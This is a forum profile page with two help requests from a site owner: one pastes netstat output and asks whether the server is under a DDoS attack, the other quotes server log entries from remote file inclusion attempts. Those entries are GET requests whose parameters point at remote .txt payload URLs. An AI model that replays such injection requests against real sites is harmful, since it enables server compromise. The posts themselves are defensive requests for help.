dheeraj4uuu
Members-
Content Count
2 -
Joined
-
Last visited
About dheeraj4uuu
-
Rank
Newbie
-
Hello,My server is using too many httpd process..I think iam under DDOs attack..I executed the following command.. tcp 0 1491 ::ffff:95.211.10.169:80 ::ffff:213.215.100.110:2263 LAST_ACK tcp 0 1493 ::ffff:95.211.10.169:80 ::ffff:85.207.126.231:52694 LAST_ACK tcp 0 1533 ::ffff:95.211.10.169:80 ::ffff:207.54.100.81:1907 LAST_ACK tcp 0 1555 ::ffff:95.211.10.169:80 ::ffff:94.216.199.59:49666 LAST_ACK tcp 0 1556 ::ffff:95.211.10.169:80 ::ffff:79.199.224.51:1250 LAST_ACK tcp 0 1558 ::ffff:95.211.10.169:80 ::ffff:207.219.125.9:4445 LAST_ACK tcp 0 1569 ::ffff:95.211.10.169:80 ::ffff:122.161.153.56:2788 LAST_ACK tcp 0 1579 ::ffff:95.211.10.169:80 ::ffff:62.31.54.30:50167 LAST_ACK tcp 0 1584 ::ffff:95.211.10.169:80 ::ffff:79.101.147.239:54629 LAST_ACK tcp 0 1604 ::ffff:95.211.10.169:80 ::ffff:89.132.65.227:4880 LAST_ACK tcp 0 1617 ::ffff:95.211.10.169:80 ::ffff:82.25.181.8:4227 LAST_ACK tcp 0 1628 ::ffff:95.211.10.169:80 ::ffff:77.46.252.70:2116 LAST_ACK tcp 0 1723 ::ffff:95.211.10.169:80 ::ffff:88.178.111.6:3838 LAST_ACK tcp 0 3252 ::ffff:95.211.10.169:80 ::ffff:76.120.33.115:4181 LAST_ACK tcp 106 0 ::ffff:95.211.10.169:80 ::ffff:174.132.216.26:38244 ESTABLISHED tcp 163 0 ::ffff:95.211.10.169:80 ::ffff:193.2.216.130:41690 CLOSE_WAIT tcp 164 0 ::ffff:95.211.10.169:80 ::ffff:76.174.2.134:65249 CLOSE_WAIT tcp 177 0 ::ffff:95.211.10.169:80 ::ffff:119.63.194.124:46871 CLOSE_WAIT tcp 196 0 ::ffff:95.211.10.169:80 ::ffff:77.232.69.160:51396 CLOSE_WAIT tcp 213 0 ::ffff:95.211.10.169:80 ::ffff:174.36.52.105:38332 CLOSE_WAIT tcp 218 0 ::ffff:95.211.10.169:80 ::ffff:72.30.142.183:45186 CLOSE_WAIT tcp 218 0 ::ffff:95.211.10.169:80 ::ffff:72.30.142.183:46711 CLOSE_WAIT tcp 218 0 ::ffff:95.211.10.169:80 ::ffff:72.30.142.183:47529 CLOSE_WAIT tcp 219 0 ::ffff:95.211.10.169:80 ::ffff:67.228.157.57:53628 CLOSE_WAIT tcp 225 0 ::ffff:95.211.10.169:80 ::ffff:75.7.19.214:61179 CLOSE_WAIT tcp 226 0 ::ffff:95.211.10.169:80 ::ffff:174.36.52.109:57823 CLOSE_WAIT tcp 226 0 ::ffff:95.211.10.169:80 ::ffff:174.36.52.98:45852 CLOSE_WAIT tcp 228 0 ::ffff:95.211.10.169:80 ::ffff:174.36.52.98:32786 CLOSE_WAIT tcp 231 0 ::ffff:95.211.10.169:80 ::ffff:75.37.34.143:50308 CLOSE_WAIT tcp 247 0 ::ffff:95.211.10.169:80 ::ffff:174.36.52.110:35686 CLOSE_WAIT tcp 253 0 ::ffff:95.211.10.169:80 ::ffff:75.37.34.143:50198 CLOSE_WAIT tcp 253 0 ::ffff:95.211.10.169:80 ::ffff:97.74.24.1:34023 CLOSE_WAIT tcp 275 0 ::ffff:95.211.10.169:80 ::ffff:66.249.68.230:33723 CLOSE_WAIT tcp 332 0 ::ffff:95.211.10.169:80 ::ffff:74.55.61.2:3147 CLOSE_WAIT tcp 367 0 ::ffff:95.211.10.169:80 ::ffff:213.55.78.183:38888 ESTABLISHED tcp 368 0 ::ffff:95.211.10.169:80 ::ffff:93.86.209.115:58909 CLOSE_WAIT tcp 374 0 ::ffff:95.211.10.169:80 ::ffff:87.208.191.218:51908 ESTABLISHED tcp 380 0 ::ffff:95.211.10.169:80 ::ffff:82.236.100.52:3241 ESTABLISHED tcp 405 0 ::ffff:95.211.10.169:80 ::ffff:72.30.142.183:45525 CLOSE_WAIT tcp 405 0 ::ffff:95.211.10.169:80 ::ffff:72.30.142.183:46994 CLOSE_WAIT tcp 405 0 ::ffff:95.211.10.169:80 ::ffff:72.30.142.183:48590 CLOSE_WAIT tcp 413 0 ::ffff:95.211.10.169:80 ::ffff:71.254.106.108:50578 ESTABLISHED tcp 417 0 ::ffff:95.211.10.169:80 ::ffff:72.30.142.183:49632 CLOSE_WAIT tcp 420 0 ::ffff:95.211.10.169:80 ::ffff:72.30.142.183:55229 CLOSE_WAIT tcp 434 0 ::ffff:95.211.10.169:80 ::ffff:92.249.214.140:49432 ESTABLISHED tcp 445 0 ::ffff:95.211.10.169:80 ::ffff:189.19.6.79:62627 CLOSE_WAIT tcp 463 0 ::ffff:95.211.10.169:80 ::ffff:79.47.143.218:1558 ESTABLISHED tcp 468 0 ::ffff:95.211.10.169:80 ::ffff:72.30.142.183:45015 CLOSE_WAIT tcp 468 0 ::ffff:95.211.10.169:80 ::ffff:72.30.142.183:46515 CLOSE_WAIT tcp 468 0 ::ffff:95.211.10.169:80 ::ffff:72.30.142.183:48100 CLOSE_WAIT tcp 502 0 ::ffff:95.211.10.169:80 ::ffff:85.193.245.38:55076 ESTABLISHED tcp 506 0 ::ffff:95.211.10.169:80 ::ffff:72.252.26.104:53420 ESTABLISHED tcp 523 0 ::ffff:95.211.10.169:80 ::ffff:212.175.112.14:53611 CLOSE_WAIT tcp 528 0 ::ffff:95.211.10.169:80 ::ffff:24.203.90.163:2290 ESTABLISHED tcp 529 0 ::ffff:95.211.10.169:80 ::ffff:129.1.31.93:4646 CLOSE_WAIT tcp 536 0 ::ffff:95.211.10.169:80 ::ffff:200.77.144.43:42023 ESTABLISHED tcp 538 0 ::ffff:95.211.10.169:80 ::ffff:87.208.191.218:51909 ESTABLISHED tcp 547 0 ::ffff:95.211.10.169:80 ::ffff:89.134.70.155:4610 CLOSE_WAIT tcp 549 0 ::ffff:95.211.10.169:80 ::ffff:91.150.114.16:11949 ESTABLISHED tcp 552 0 ::ffff:95.211.10.169:80 ::ffff:201.29.216.114:61179 CLOSE_WAIT tcp 553 0 ::ffff:95.211.10.169:80 ::ffff:69.250.23.83:38959 CLOSE_WAIT tcp 553 0 ::ffff:95.211.10.169:80 ::ffff:91.150.114.16:11948 ESTABLISHED tcp 556 0 ::ffff:95.211.10.169:80 ::ffff:24.238.26.131:4387 CLOSE_WAIT tcp 556 0 ::ffff:95.211.10.169:80 ::ffff:24.238.26.131:4388 CLOSE_WAIT tcp 556 0 ::ffff:95.211.10.169:80 ::ffff:91.150.114.16:11946 ESTABLISHED tcp 561 0 ::ffff:95.211.10.169:80 ::ffff:91.150.114.16:11945 ESTABLISHED tcp 565 0 ::ffff:95.211.10.169:80 ::ffff:94.189.144.75:62532 CLOSE_WAIT tcp 566 0 ::ffff:95.211.10.169:80 ::ffff:69.250.23.83:39887 CLOSE_WAIT tcp 566 0 ::ffff:95.211.10.169:80 ::ffff:71.105.25.22:50343 CLOSE_WAIT tcp 569 0 ::ffff:95.211.10.169:80 ::ffff:87.114.146.77:49670 CLOSE_WAIT tcp 572 0 ::ffff:95.211.10.169:80 ::ffff:69.250.23.83:36593 CLOSE_WAIT tcp 572 0 ::ffff:95.211.10.169:80 ::ffff:69.250.23.83:42953 CLOSE_WAIT tcp 572 0 ::ffff:95.211.10.169:80 ::ffff:79.55.86.219:50245 CLOSE_WAIT tcp 574 0 ::ffff:95.211.10.169:80 ::ffff:77.51.10.24:46057 CLOSE_WAIT tcp 577 0 ::ffff:95.211.10.169:80 ::ffff:87.196.21.10:49359 CLOSE_WAIT tcp 583 0 ::ffff:95.211.10.169:80 ::ffff:193.179.147.25:14006 CLOSE_WAIT tcp 584 0 ::ffff:95.211.10.169:80 ::ffff:188.48.82.219:49322 CLOSE_WAIT tcp 590 0 ::ffff:95.211.10.169:80 ::ffff:120.50.180.171:2153 CLOSE_WAIT tcp 604 0 ::ffff:95.211.10.169:80 ::ffff:77.51.10.24:46055 CLOSE_WAIT tcp 612 0 ::ffff:95.211.10.169:80 ::ffff:77.51.10.24:46056 CLOSE_WAIT tcp 613 0 ::ffff:95.211.10.169:80 ::ffff:86.49.14.151:61271 ESTABLISHED tcp 620 0 ::ffff:95.211.10.169:80 ::ffff:89.137.146.69:2894 CLOSE_WAIT tcp 621 0 ::ffff:95.211.10.169:80 ::ffff:76.225.187.232:61191 ESTABLISHED tcp 628 0 ::ffff:95.211.10.169:80 ::ffff:189.84.86.105:1599 CLOSE_WAIT tcp 628 0 ::ffff:95.211.10.169:80 ::ffff:189.84.86.105:1601 CLOSE_WAIT tcp 628 0 ::ffff:95.211.10.169:80 ::ffff:189.84.86.105:1603 CLOSE_WAIT tcp 632 0 ::ffff:95.211.10.169:80 ::ffff:41.5.28.26:18778 CLOSE_WAIT tcp 634 0 ::ffff:95.211.10.169:80 ::ffff:189.30.226.197:61086 CLOSE_WAIT tcp 643 0 ::ffff:95.211.10.169:80 ::ffff:189.123.210.44:4998 CLOSE_WAIT tcp 649 0 ::ffff:95.211.10.169:80 ::ffff:24.250.124.104:42269 CLOSE_WAIT tcp 651 0 ::ffff:95.211.10.169:80 ::ffff:67.10.160.58:32969 CLOSE_WAIT tcp 655 0 ::ffff:95.211.10.169:80 ::ffff:125.165.64.213:1462 CLOSE_WAIT tcp 656 0 ::ffff:95.211.10.169:80 ::ffff:201.34.141.37:45240 ESTABLISHED tcp 661 0 ::ffff:95.211.10.169:80 ::ffff:194.80.32.10:43557 CLOSE_WAIT tcp 726 0 ::ffff:95.211.10.169:80 ::ffff:24.177.14.59:1390 CLOSE_WAIT tcp 731 0 ::ffff:95.211.10.169:80 ::ffff:200.2.152.130:41983 CLOSE_WAIT tcp 733 0 ::ffff:95.211.10.169:80 ::ffff:90.40.196.232:52809 ESTABLISHED tcp 733 0 ::ffff:95.211.10.169:80 ::ffff:90.40.196.232:52816 ESTABLISHED tcp 760 0 ::ffff:95.211.10.169:80 ::ffff:74.216.117.95:60982 CLOSE_WAIT tcp 763 0 ::ffff:95.211.10.169:80 ::ffff:220.227.41.243:42352 ESTABLISHED tcp 865 0 ::ffff:95.211.10.169:80 ::ffff:83.103.111.12:2905 ESTABLISHED tcp 975 0 ::ffff:95.211.10.169:80 ::ffff:82.80.156.64:1263 CLOSE_WAIT Am i under DDos...Attack ..if so please tell me how to avoid this...
-
Hello, If this is not the correct forum please tell me where to post this question... My site is been attacking by one hacker from past two days...with RFI attack..He was using the following code to attack my server.. "GET /archive/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/environment.php?DIR_PREFIX=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 403 5380 "-" "Mozilla/5.0" Can you tell me where the vulnarabillity is in or which file he was accessing...I have a vbulletin and wordpress running on it..Both have archives in it...I have given a complaint to my hosting company even they are helpless they are not finding where the problem is... Another attack recently took was with the following logged in my error log (36)File name too long: Cannot map GET /archive/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://212.227.74.68/catalog/safe.txt? HTTP/1.1 to file